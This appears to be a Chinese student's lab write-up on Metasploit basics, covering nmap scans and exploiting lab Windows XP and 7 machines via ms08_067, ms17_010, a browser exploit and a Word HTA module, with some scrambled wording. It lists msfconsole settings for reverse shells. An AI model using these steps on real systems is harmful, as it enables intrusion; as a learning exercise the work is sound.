MSF基础应用

模块说明

exploit

这个是攻击模块,专门利用漏洞来打通链接的。以前的实验已经作出了后门,可是都须要咱们手动传输到靶机并打开才行,这样的话就须要社会工程学攻击来辅助才能成功,由于别人的电脑不可能那么配合咱们的。这时候就须要exploit模块来帮咱们了,exploit模块能够利用漏洞帮咱们把payload送到靶机。面试

payload

是有效载荷,后面通常加要对靶机进行攻击的代码,包含了各类各样调戏靶机的手段,能够完成对靶机的各类操做,来完成咱们的攻击目的。shell

encode

编码器,对代码进行异或运算、去除坏字符等等,保护payload不被发现。payload明目张胆的过去确定是要被杀的,而encode给payload整个容杀软啥的就认不出payload了,因而payload才能安心干坏事。windows

环境

主机:kali浏览器

靶机:windows xp SP3 english、windows 7 sp1 english安全

namp扫描

先给出namp经常使用的功能:

进行ping扫描,打印出对扫描作出响应的主机,不作进一步测试(如端口扫面或者操做系统探测):
nmap -sP 192.168.1.0/24
探测目标主机开放的端口,能够指定一个以逗号分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个彻底的TCP链接,执行得很快:
nmap -sS 192.168.1.0/24
肯定目标机支持哪些IP协议 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探测目标主机的操做系统:
nmap -O 192.168.1.19
nmap -A 192.168.1.19
进行秘密SYN扫描,对象为主机Saznme所在的“C类”网段的255台主机。同时尝试肯定每台工做主机的操做系统类型。由于进行SYN扫描 和操做系统检测,这个扫描须要有根权限。
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
 
由于不知道同网段哪些地址是有用的,因此先对同网段进行syn扫描,以后在对具体ip进行端口扫描,能够节省时间。
 

 

其实这边知道xp的ip是192.168.201.129,接着用nmap -PS 192.168.201.128来进行端口扫描,由于下面要用到ms08_067攻击模块进行攻击,因此要确保445端口是打开的,也就是能够ping通。结果发现xp防火墙打开的时候445是默认关闭的,因而把防火墙关掉再扫描能够看见445端口已经打开。这样第一步准备工做就差很少了。网络

 

利用ms08_067进行渗透

在msfconsole下search先找到这个模块而且use该模块tcp

首先应当show targets查看该exploit模块可攻击的对象,不然可能白费功夫,咱们的xp是sp3 english,能够被该模块攻击。工具

 

接下先设置payload,show payloads能够列出该攻击模块支持的payload。这里选了shell_reverse_tcp做为payload。测试

以后设置一些必要的options,若是不知道设置哪些东西能够先show options查看一下。对这个模块和payload只须要设置设置回连ip和监听ip就可使用了。编码

set RHOST 192.168.201.129  #设置回连ip,即靶机ip
set LHOST 192.168.201.128  #设置监听ip

而后exploit,大功告成

 

 利用永恒之蓝ms17_010模块攻击win7 

先挂上攻击成功的截图

大概的攻击流程以下

set payload xxx     #设置payload
set RHOST xxx      #设置目标ip
set LHOST xxx      #设置监听ip
set smbuser xxx    #设置用户名,靶机上的用户
set smbpass xxx    #设置登陆密码
exploit

这里用的是ms17_010_psexec模块,ms17_01还有ms17_010_eternalblue版本,当时是由于看到ms17_010_psexec模块比较新因此用它。可是这个模块还须要输入用户名密码来实现攻击,显得不是很好用。而后查了百度说是有些ms17_010_eternalblue模块能够不用输入用户名和密码来攻击,而后本身亲测了如下,从下图看出应该是无法攻击我这个系统,输了帐号密码也不行,看来新版本仍是靠谱一点。

用了这个漏洞感受没想象的那么强大,还要输用户名密码,从另外一个角度看来,平时用电脑啥的多设置一个密码真是好习惯。这个模块提供了一个相似字典暴力破的东西,能够经过管道输入一堆用户名用于测试来打通链接。因此相似“Administrator+空密码”这类用户就得遭殃了。

能想到用这个漏洞是由于在用openvas扫描后发现提示smb漏洞攻击成功率很高,因此去msfconsole里面search了一下就找到了。原本这个漏洞是但愿拿来攻击win10的,不过不行,target提示错误了。因而又拿去win7试了一下打通了。

 

openvas的安装和使用老师的文档里讲的很清楚,这里不做赘述。

若是要更好的利用这个漏洞,能够利用smb_ms17_010辅助模块来扫描能够攻击的ip,这个辅助模块在必定程度上弥补了须要用户名密码的缺陷。

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.201.0/24         #扫描192.168.201.0-192.168.201.255的ip
run

 

 

利用ms14_064针对浏览器攻击

这个模块是经过search browser随便找出的一个,以前试了好几个都很差用。还在exploit-db上下载了一个比较新的,由于是适用火狐44.0.2的,还特地下了,结果搞了半天出不告终果。

这些模块用起来都差很少:

set SRVHOST xxx    #本身的ip
set payload xxx       #选一个合适的payload
set LHOST xxx         #本身的ip
exploit

和前面的主动攻击不一样的是须要在靶机上访问生成的url,如上图所示,这个url能够本身设置。而后在xp系统中打开ie,输入url访问,在kali的msfconsole下就能够看到结果了,以下图。

 

这个漏洞targets里面说能够攻击xp和win 7,不过亲测只有xp能通。

 利用office_word_hta模块攻击win7

在windows/fileformat下面翻了很久找到这么一个好用的模块,也是为了知足试验要求。

看这个模块的options能够发现参数都有默认配置,其实直接就能够用,要改也只须要改一下SRVHOST就能够。

而后在win7上访问下图中的url测试,渗透成功。

show options就能够知道应该配置哪些选项

exploit-db上导入模块

首先在exploit-db上找到本身须要的模块并下载,通常只有标有meterpreter下下来才是能够导入的.rb文件。找到meterpreter的module的路径,只须要把.rb文件放到module里面而后msfconsole从新导入就能够了,不过最好能够新建一个文件夹专门放本身的module。

拷贝进去以后打开msfconsle,

msf>   reload_all

结束后能够use测试一下。

 

 实验体会

此次实验刚开始有点不知从何下手,听老师说的去exploit-db上找个攻击win10的模块,不装xp。结果忙活了大半天试了几个啥反应都没有,最后仍是放弃win10转战win7和xp。

我先是下了一个Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit),操做感受都ok,但是到最后win10浏览器打开连接出现几个提示就没反应了。后面又试了一个针对firefox浏览器44.0.2版本的攻击,按它说明是windows平台点开连接浏览器会崩并打开calc.exe,然而我本身试确实浏览器崩了啥反应没有。。。

而后我就装了xp照着实验指导用ms08_067模块试了一下,没几下就搞定了。对比以前最大的感觉就是这些meterpreter装好的模块的说明很详细,基本上随便一个模块show targets + show options +show payloads就能够直接用了,不行再打开.rb文件里面看注释也挺详细的。但是exploit-db上的帮助和targets啥的根本看不出什么东西,出错了报错也不完善,估计是别人刚开发就传上去了,对新手太不友好了。

xp成功后我又开始对win10有想法了,而后利用端口扫描看打开的端口。针对这几个端口我又测试了几个模块,依然gg,但是又以为xp如今的使用率已经很低了,因而装了个win7开搞。

而后用以前对win10用过的模块在win7上面试了一下,结果就成功了,看来仍是要跟着时代走,该更新仍是要更新。

我以为此次实验其实难点根本就再也不攻击模块的使用,可否用好辅助模块反而更关键。若是把辅助模块用好了,就能少走不少弯路,避免不少没必要要的工做。还有漏洞扫描工具openvas我是作了一半才去使用它的,如今看来第一步就应该拿这个扫一遍,应该拿什么模块攻击search一下全出来了。

作了此次实验感受要实现局域网内的攻击是比较容易的,听了老师对网络通讯的一个介绍后,感受要黑外网的电脑太难了,除非能把各个网关都黑掉,基本只能钓鱼等着用户本身去点。反过来看只要咱们不点不良连接,提升网络安全意识,要被黑客给黑到真的是很难的。同时应该注意到局域网的安全性不是那么有保障,应该少连一些路边wifi,省得啥时候被黑了都不知道,还有就是操做系统的更新、漏洞的修复真的有用啊,我要是不更新win10,能是下面这个结果吗(192.168.201.1就是个人win10),win7都不用下了。

相关文章
相关标签/搜索